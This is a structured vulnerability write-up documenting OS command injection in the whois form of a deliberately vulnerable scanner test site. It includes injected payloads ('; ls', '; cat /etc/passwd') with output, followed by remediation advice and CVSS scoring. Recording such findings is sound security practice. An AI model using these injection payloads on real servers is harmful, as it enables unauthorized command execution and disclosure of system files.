## Version 1.4.1
## language: en

Feature:
  TOE:
    web-scanner-test-site
  Category:
    OS command injection
  Location:
    http://webscantest.com/
  CWE:
    CWE-78: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Execute commands from the web server.
  Recommendation:
    Sanitize every input.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ParrotSec       | 4.19.0      |
    | Firefox         | 67.0.1      |
  TOE information:
    Given I am accesing the webpage http://webscantest.com/osrun/whois.php
    And is runing on Ubuntu 14.04.2 LTS
    And is running Apache/2.4.16 (Unix)

  Scenario: Normal use case
  Users can use the webapp to make whois requests
    When I input a domain name in the box
    Then I get a whois answer from the server
    And I get the following output:
    """
    Domain Name: GOOGLE.COM
    Registry Domain ID: 2138514_DOMAIN_COM-VRSN
    Registrar WHOIS Server: whois.markmonitor.com
    Registrar URL: http://www.markmonitor.com
    Updated Date: 2018-02-21T18:36:40Z
    Creation Date: 1997-09-15T04:00:00Z
    Registry Expiry Date: 2020-09-14T04:00:00Z
    ---SNIP---
    """

  Scenario: Static detection
  No code given

  Scenario: Dynamic detection
    When I input a domain into the box
    Then I get a whois answer from the server
    Given the web server directly inputs to the os
    And I can input any os command wanted, so I input this command:
    """
    ; ls
    """
    And I got the following output:
    """
    index.php
    """
    And I can conclude that the service does not sanitize inputs

  Scenario: Exploitation
  In order to to execute commands we need to pass them after a semicolon
    Given the server does not properly sanitize inputs
    When I executed the following command
    """
    ; cat /etc/passwd
    """
    Then I got the following output:
    """
    root:x:0:0:root:/root:/bin/bash
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/usr/sbin/nologin
    sysadmin:x:1000:1000::/home/sysadmin:/bin/bash
    ---SNIP---
    """
    And I concluded that the webapp does not sanitize inputs.

  Scenario: Remediation
  Sanitize every input that contains special characters like (; or &) to prevent
  this kind of vulnerabilities.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.3/10 (high) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    7/10 (high) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.6/10 (medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:L/MA:L

  Scenario: Correlations
  No correlations have been found to this date 13/06/2019